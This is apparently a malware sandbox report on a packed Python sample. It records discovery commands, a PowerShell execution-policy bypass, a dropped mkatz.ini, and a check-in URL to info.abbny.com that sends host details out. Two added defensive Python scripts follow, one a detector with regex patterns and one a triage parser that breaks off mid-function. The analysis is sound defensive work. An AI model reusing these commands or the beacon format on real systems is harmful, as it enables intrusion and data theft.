c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\microsoft.net\framework\v2.0.50727\wminet_utils.dll
c:\windows\system32\wbem\wmiutils.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll
c:\windows\system32\cabinet.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\logoncli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\hid.dll
c:\windows\system32\winscard.dll
c:\windows\system32\winsta.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\vaultcli.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll

PID
2368
CMD
C:\Windows\system32\cmd.exe /c ipconfig /all
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ipconfig.exe

PID
2556
CMD
ipconfig /all
Path
C:\Windows\system32\ipconfig.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
IP Configuration Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ipconfig.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qagent.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll

PID
3548
CMD
ipconfig /all
Path
C:\Windows\system32\ipconfig.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
IP Configuration Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\ipconfig.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qagent.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll

PID
2232
CMD
netstat -na
Path
C:\Windows\system32\netstat.exe
Indicators
No indicators
Parent process
6_URL_ii.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
TCP/IP Netstat Command
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\netstat.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\inetmib1.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
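
Every discovery command in this run is a child of PID 4068, either directly or through cmd.exe and, for the `net` commands, net.exe and net1.exe, and the whole chain completed inside the 60-second task. That shape, one non-standard parent fanning out several distinct discovery techniques in a short window, is what a detection should key on; any single `ipconfig /all` is something administrators run all day. The block below is an added example and not part of the report: it replays the process tree above as constructed Sysmon-style process-creation records (timestamps are invented, since the report gives no per-process times; the last record is a benign control), walks each hit up through wrapper processes to the real originator, and separately flags the `powershell.exe -exec bypass` launch of a script from the user's Temp directory. The ATT&CK IDs in `DISCOVERY_RULES` are the techniques these commands are normally mapped to.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records. PIDs, parents and command lines are the
# ones listed in this report; ts (seconds since task start) is invented. The final record is a
# benign control: an administrator's own shell running a single discovery command.
EVENTS = [
    dict(ts=0,  pid=3120, ppid=1,    cmd=r'"C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe"'),
    dict(ts=2,  pid=4068, ppid=3120, cmd=r'"C:\Users\admin\AppData\Local\Temp\6_URL_ii.exe"'),
    dict(ts=5,  pid=2356, ppid=4068, cmd="cmd /c wmic ntdomain get domainname"),
    dict(ts=5,  pid=2568, ppid=2356, cmd="wmic ntdomain get domainname"),
    dict(ts=8,  pid=3832, ppid=4068, cmd="cmd /c net localgroup administrators"),
    dict(ts=8,  pid=4044, ppid=3832, cmd="net localgroup administrators"),
    dict(ts=8,  pid=2468, ppid=4044, cmd=r"C:\Windows\system32\net1 localgroup administrators"),
    dict(ts=11, pid=3220, ppid=4068, cmd='cmd /c net group "domain admins" /domain'),
    dict(ts=11, pid=3428, ppid=3220, cmd='net group "domain admins" /domain'),
    dict(ts=11, pid=3744, ppid=3428, cmd=r'C:\Windows\system32\net1 group "domain admins" /domain'),
    dict(ts=15, pid=2584, ppid=4068, cmd=r'powershell.exe -exec bypass "import-module C:\Users\admin\AppData\Local\Temp\m2.ps1"'),
    dict(ts=20, pid=2368, ppid=4068, cmd=r"C:\Windows\system32\cmd.exe /c ipconfig /all"),
    dict(ts=20, pid=2556, ppid=2368, cmd="ipconfig /all"),
    dict(ts=22, pid=3548, ppid=4068, cmd="ipconfig /all"),
    dict(ts=25, pid=2232, ppid=4068, cmd="netstat -na"),
    dict(ts=30, pid=5000, ppid=900,  cmd="ipconfig /all"),
]

# (pattern, category, ATT&CK technique). Win32_NTDomain lists the host's domain and its trusted
# domains, hence the T1482 mapping for the wmic query.
DISCOVERY_RULES = [
    (re.compile(r"\bwmic\b.*\bntdomain\b", re.I), "domain_name", "T1482"),
    (re.compile(r"\bnet1?\b.*\blocalgroup\b", re.I), "local_groups", "T1069.001"),
    (re.compile(r"\bnet1?\b.*\bgroup\b.*/domain\b", re.I), "domain_groups", "T1069.002"),
    (re.compile(r"\bipconfig\b", re.I), "network_config", "T1016"),
    (re.compile(r"\bnetstat\b", re.I), "network_connections", "T1049"),
]
WRAPPERS = {"cmd", "net", "net1"}   # hops that only relay a command to a child process
PS_BYPASS = re.compile(r"\bpowershell(?:\.exe)?\b.*?-(?:ex\w*|ep)\s+bypass\b", re.I)  # -ex.. is a prefix of -ExecutionPolicy
PS1_PATH = re.compile(r"""[A-Za-z]:\\[^"']*?\.ps1""", re.I)
USER_WRITABLE = re.compile(r"\\(?:appdata|temp|downloads|public|programdata)\\", re.I)


def exe_name(cmd: str) -> str:
    """Lower-case image name without path or .exe, from the first token of a command line."""
    tok = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split(None, 1)[0]
    base = tok.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base


def origin_of(event: dict, by_pid: dict) -> int:
    """Walk up through cmd/net/net1 wrappers to the PID that actually initiated the command."""
    cur, seen = event["ppid"], set()
    while cur in by_pid and cur not in seen and exe_name(by_pid[cur]["cmd"]) in WRAPPERS:
        seen.add(cur)
        cur = by_pid[cur]["ppid"]
    return cur


def discovery_bursts(events, window=60, min_categories=3):
    """Alert when one originating process runs >= min_categories distinct discovery
    categories within `window` seconds, whatever wrappers it used to run them."""
    by_pid = {e["pid"]: e for e in events}
    hits = defaultdict(list)
    for e in events:
        for pattern, category, technique in DISCOVERY_RULES:
            if pattern.search(e["cmd"]):
                hits[origin_of(e, by_pid)].append((e["ts"], category, technique, e["pid"]))
    alerts = []
    for origin, hs in hits.items():
        hs.sort()
        best = None
        for i, (t0, _, _, _) in enumerate(hs):           # sliding window over the origin's hits
            inwin = [h for h in hs[i:] if h[0] <= t0 + window]
            cats = {h[1] for h in inwin}
            if len(cats) >= min_categories and (best is None or len(cats) > len(best["categories"])):
                best = {"origin_pid": origin,
                        "origin_exe": exe_name(by_pid[origin]["cmd"]) if origin in by_pid else "<unknown>",
                        "categories": sorted(cats), "techniques": sorted({h[2] for h in inwin}),
                        "child_pids": sorted({h[3] for h in inwin}),
                        "first_ts": inwin[0][0], "last_ts": inwin[-1][0]}
        if best:
            alerts.append(best)
    return alerts


def bypass_powershell(events):
    """PowerShell started with an execution-policy bypass; notes the script and whether its path is user-writable."""
    findings = []
    for e in events:
        if not PS_BYPASS.search(e["cmd"]):
            continue
        m = PS1_PATH.search(e["cmd"])
        script = m.group(0) if m else None
        findings.append({"pid": e["pid"], "ppid": e["ppid"], "script": script,
                         "user_writable": bool(script and USER_WRITABLE.search(script))})
    return findings


if __name__ == "__main__":
    for finding in discovery_bursts(EVENTS) + bypass_powershell(EVENTS):
        print(finding)
```

Feeding the report's tree through `discovery_bursts` yields a single alert rooted at PID 4068 covering five categories within 20 seconds, while the control record produces nothing; shrinking `window` to 5 seconds also produces nothing, which is the knob to tune against your own telemetry. `bypass_powershell` fires on PID 2584 because the script lives under `AppData\Local\Temp`; the report does not show the contents of m2.ps1, so what it does remains an open question for the full report.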

Registry activity

Total events
320
Read events
265
Write events
55
Delete events
0

Modification events

PID   Process         Operation  Key                                                    Name          Value
2584  powershell.exe  write      HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E  LanguageList  en-US

Files activity

Executable files
28
Suspicious files
2
Text files
5
Unknown types
0

Dropped files

PID
Process
Filename
Type
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._ARC4.pyd
executable
MD5: 8d85dbf6c981bff4e8a1bea86a0ac5e9
SHA256: 356623219b8c098435d511c0055c061018641d8b700eb089fc6ff87d233260e1
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\bz2.pyd
executable
MD5: 0b1688c02640ec14d85e1cc3c93f7276
SHA256: 753ea279675eeb34fe58908f10cb15886955c865b49c01b533a5930e6b326038
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32api.pyd
executable
MD5: 4808fc8e377c68afc58e512eaeb92984
SHA256: 63112adebc44d8183faa148e53cc48ddda0a9fb11c7d15a1ef5c8b36023f1205
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Hash._SHA256.pyd
executable
MD5: 977aa3580a3d9cd373407967086c88b8
SHA256: 5c651f53138499b2dd436e1a432dac3f0eed4ba1426685a0f4edcfed05349c90
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32pipe.pyd
executable
MD5: 0d4a1785aa8f949cfa2a19278cbe3c81
SHA256: 2efc1764b23e02b2e91016ea331e68207cb5c2579166ca305a196fe343719d4d
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_hashlib.pyd
executable
MD5: 22071845daf8c1f6e87f006673eed4fd
SHA256: 51c47389782bc2de8e401d231233e2e7f1a4b3afce7df4ddf4ad533184dad407
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\python27.dll
executable
MD5: f5c5c0d5d9e93d6e8cb66b825cd06230
SHA256: e3eed66221a6552d4b9ae7350b3dc30de238a6029efae060514d2780c02fedb4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_mssql.pyd
executable
MD5: e0aa19ec9424664a61a8413cdf346a67
SHA256: d5253b4c05f1f82b066f4d59294dc3f531a74161161a1857d6bbb44d61639608
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32event.pyd
executable
MD5: 997b91ab18b0e50a458b6093a77c1f51
SHA256: 3f2d34661fd5cc1c800c121ad8ed1077ad62888a688fea23dcf2617aceed2d7c
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Random.OSRNG.winrandom.pyd
executable
MD5: 731a6b82b8475e383dac97b20aeab7f7
SHA256: d710b5a398dd0dc128129f3b035d459d6860b5c45ccc8ee2066069202b9d1f30
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Hash._MD4.pyd
executable
MD5: f98765af6763cfe9ece7136f14f88397
SHA256: d722ed0ee7fef1f30860f83b3fecfa089955ca0d6b522a379efdc34f0401e321
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._DES.pyd
executable
MD5: 4b7b86b41280dfd1e1d29a7f626393ef
SHA256: 8b0f41fd5a3d78e7c4990b1df3414c4fa221624444f318bb0a29f92f02b1a15e
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_multiprocessing.pyd
executable
MD5: cc3b15be403249398c53d3e7d720893f
SHA256: 6a6b8cb5cad9769a07af9a50bab5b3c848b411f66d7723c7e4c65d9e7dbe08ed
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._DES3.pyd
executable
MD5: f6d78ab78381bf4056335a75ee7c8523
SHA256: 5317f80ae3b32d6a3d4ce013bdf93f5d857e6625bc89c778171983e95865abe4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\pyexpat.pyd
executable
MD5: 136a3d873192913c40a1270352a97787
SHA256: a8561293134f940ff1c95b2be82b24a80c22b851e8594008b567a2842a60e9ab
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_socket.pyd
executable
MD5: b7c3e334648a6cbb03b550b842818409
SHA256: f0781a1b879584f494d984e31869eab13f0535825f68862e6597b1639df708bd
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_ssl.pyd
executable
MD5: 27a7a40b2b83578e0c3bffb5a167d67a
SHA256: ea0efcab32e6572f61a3c765356e283bd6a8f75ec2a4c8b12f1fb3db76ca68d4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Util.strxor.pyd
executable
MD5: 32dce0579bd19ff24bd4a1accf5afc73
SHA256: 2170b576f5f22d06e700e5570dc234fa5f77c7fe4af8394f0dac49566f9a8b40
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\msvcr90.dll
executable
MD5: cdbe9690cf2b8409facad94fac9479c9
SHA256: 8e7fe1a1f3550c479ffd86a77bc9d10686d47f8727025bb891d8f4f0259354c8
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\_ctypes.pyd
executable
MD5: 98638a1bfdecdcecf4d7d47b521ac903
SHA256: 11c739d28227773d70c3941d2e979b9d4cee12f1d53cc94daf77b62a4d3a0327
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\win32wnet.pyd
executable
MD5: ba30a2a5208405c1d8eece685a9a3adf
SHA256: 2611a0c3ac7a2c10316c6532570345ea697d03e74c56e3eb0fea322b48fc7072
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Util._counter.pyd
executable
MD5: 556bd0c831364879e75e873da82dccf8
SHA256: a3c7473617025de594f45ea4eb0b943f6e406935017d746de2c310698e3c689d
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\select.pyd
executable
MD5: dcee0dbcf84cc9f1620f168d8f8f9fd1
SHA256: 385e7a3cf5dd7b65590b064e7bc09f901db7ddc8542396af6bb60048a30993f0
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\msvcp90.dll
executable
MD5: 4c39358ebdd2ffcd9132a30e1ec31e16
SHA256: 06918cf99ad26cd6cf106881c0d5bdb212dc0bac4549805c9f5906e3d03d152c
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Crypto.Cipher._AES.pyd
executable
MD5: 9fd78d7d6ab69af5a14e0f29affd7ef4
SHA256: 87c920ed2c1afcf295729563b4def671dc9e36ef8b3e183d4836571300180e74
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\msvcm90.dll
executable
MD5: d34a527493f39af4491b3e909dc697ca
SHA256: 7a74da389fbd10a710c294c2e914dc6f18e05f028f07958a2fa53ac44f0e4b90
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\pywintypes27.dll
executable
MD5: f3ef005e60f838eaaa44529daeeb93ab
SHA256: 241ecbd87410e9b23339d494f9eca7ddf8083472661989f489fdd7fe0b8776b4
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\unicodedata.pyd
executable
MD5: 5b44d0bd38c218445dde8c913736eaac
SHA256: edec30653dc56df03eb40fa97c616950fd593c0b90c2950af722e66816eb70e9
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\ii.exe.manifest
xml
MD5: 08458035409af6baef39d93956f86e74
SHA256: 82517610333e631b6df2d74e19f217d87824b0dfd39f9cdddecb416f1ee66808
2584
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Microsoft.VC90.CRT.manifest
xml
MD5: bfb93876892cca8e2ad0021585c34c8b
SHA256: 0d060ed7c25159b7b75f16d449963bfd639c15b3c5280bc7897403268c2b9f35
3120
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\_MEI31202\Include\pyconfig.h
text
MD5: 557582e29f77226734bf9e750785bd96
SHA256: 24822847bba1ee7af1a0f02b95d36d6515c5ac37ecb180a89d9d7628fc7675fd
4068
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\m2.ps1
text
MD5: 7ac4e48cd81b8595aade2ff6423494e2
SHA256: 3f28cace99d826b3fa6ed3030ff14ba77295d47a4b6785a190b7d8bc0f337e41
2584
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2M6PSQDG5SHRVNUEYUAL.temp
––
MD5:  ––
SHA256:  ––
2584
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF212b74.TMP
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
4068
6_URL_ii.exe
C:\Users\admin\AppData\Local\Temp\mkatz.ini
text
MD5: 600a07e256becbaa2ace6a615976d9cd
SHA256: db6fb038370748a91d947afb7cbb3fd696355a19ba6f1844c144b3a1dd1c88cf


Network activity

HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
5
Threats
6

HTTP requests

PID Process Method HTTP Code IP URL CN Type Reputation
4068 6_URL_ii.exe GET 200 79.98.145.42:80 http://ip.42.pl/raw PL text suspicious
4068 6_URL_ii.exe GET 301 45.79.77.20:80 http://jsonip.com/ US html suspicious
4068 6_URL_ii.exe GET 200 153.92.4.49:80 http://info.abbny.com/e.png?id=User-PC&mac=52-54-00-4A-04-AF,00-01-00-01-21-68&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-14,09:27:52&c=1&VER=7&d=0&from=&mpass=&size=6966576&num=0&sa= US text malicious


Connections

PID Process IP ASN CN Reputation
4068 6_URL_ii.exe 79.98.145.42:80 Nitronet Sp. z o.o. PL suspicious
4068 6_URL_ii.exe 45.79.77.20:80 Linode, LLC US suspicious
4068 6_URL_ii.exe 153.92.4.49:80 US suspicious
4068 6_URL_ii.exe 45.79.77.20:443 Linode, LLC US suspicious
4068 6_URL_ii.exe 192.168.1.2:445 –– shared
4068 6_URL_ii.exe 192.168.1.2:1433 –– shared

DNS requests

Domain IP Reputation
info.ackng.com No response unknown
ip.42.pl 79.98.145.42 suspicious
info.beahh.com No response unknown
jsonip.com 45.79.77.20 suspicious
info.abbny.com 153.92.4.49 malicious

Threats

PID Process Class Message
4068 6_URL_ii.exe Attempted Information Leak ET POLICY Python-urllib/ Suspicious User Agent
4068 6_URL_ii.exe Attempted Information Leak ET POLICY Python-urllib/ Suspicious User Agent
4068 6_URL_ii.exe Attempted Information Leak ET POLICY Python-urllib/ Suspicious User Agent
4068 6_URL_ii.exe Misc activity ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection
4068 6_URL_ii.exe Misc activity ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection
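Read together, the tables above describe a PyInstaller-packed Python 2.7 program (the _MEI31202 drop directory holding python27.dll plus pycrypto, pymssql and pywin32 extension modules) that first asks two public IP-echo services for its own address, then reports a host fingerprint (hostname, adapter MACs, OS build, bitness, local timestamp) to info.abbny.com inside the query string of a GET for e.png, and finally touches ports 445 and 1433 on a neighbouring LAN host. The script below is an added triage example, not code from this report or from the sample: it re-parses the HTTP request, connection and DNS rows exactly as they appear above (embedded as constructed sample input), decodes the check-in query into its fields, and separates the external endpoints from the internal lateral-movement probes. The port-to-service map and the reading of the two unresolved info.*.com lookups as fallback check-in domains are the example's own assumptions.

```python
"""Offline triage of the network-activity rows from this sandbox report.

Added example; the row strings below are constructed sample input copied
from the HTTP requests, Connections and DNS requests tables above.
"""
import ipaddress
from urllib.parse import parse_qs, urlsplit

HTTP_ROWS = [
    "4068 6_URL_ii.exe GET 200 79.98.145.42:80 http://ip.42.pl/raw PL text suspicious",
    "4068 6_URL_ii.exe GET 301 45.79.77.20:80 http://jsonip.com/ US html suspicious",
    "4068 6_URL_ii.exe GET 200 153.92.4.49:80 http://info.abbny.com/e.png?id=User-PC"
    "&mac=52-54-00-4A-04-AF,00-01-00-01-21-68&OS=Windows-7-6.1.7601-SP1&BIT=32bit"
    "&IT=2019-03-14,09:27:52&c=1&VER=7&d=0&from=&mpass=&size=6966576&num=0&sa= US text malicious",
]
CONN_ROWS = [
    "4068 6_URL_ii.exe 79.98.145.42:80 Nitronet Sp. z o.o. PL suspicious",
    "4068 6_URL_ii.exe 45.79.77.20:80 Linode, LLC US suspicious",
    "4068 6_URL_ii.exe 153.92.4.49:80 US suspicious",
    "4068 6_URL_ii.exe 45.79.77.20:443 Linode, LLC US suspicious",
    "4068 6_URL_ii.exe 192.168.1.2:445 –– shared",
    "4068 6_URL_ii.exe 192.168.1.2:1433 –– shared",
]
DNS_ROWS = [
    "info.ackng.com No response unknown",
    "ip.42.pl 79.98.145.42 suspicious",
    "info.beahh.com No response unknown",
    "jsonip.com 45.79.77.20 suspicious",
    "info.abbny.com 153.92.4.49 malicious",
]

# Assumption (the example's own mapping, not something the report states):
# which service the probed LAN ports belong to, for the lateral-movement summary.
PORT_SERVICES = {445: "SMB", 1433: "MSSQL", 3389: "RDP", 22: "SSH"}


def parse_http_row(row):
    """Split one HTTP-requests row into its nine whitespace-separated columns."""
    pid, proc, method, status, endpoint, url, cn, ctype, rep = row.split()
    return {"pid": int(pid), "process": proc, "method": method,
            "status": int(status), "endpoint": endpoint, "url": url,
            "cn": cn, "type": ctype, "reputation": rep}


def beacon_fields(url):
    """Decode a check-in URL's query string into a flat dict.

    keep_blank_values=True matters: the e.png request carries empty
    parameters (from=, mpass=, sa=), and those empty slots are part of the
    beacon's shape, which a detection signature should match on too.
    """
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    fields = {k: v[0] for k, v in qs.items()}
    if "mac" in fields:
        # The sample sends a comma-separated list of adapter addresses.
        fields["mac"] = fields["mac"].split(",")
    return fields


def classify_connections(rows):
    """Separate external endpoints from RFC 1918 targets probed on the LAN."""
    external, internal = [], []
    for row in rows:
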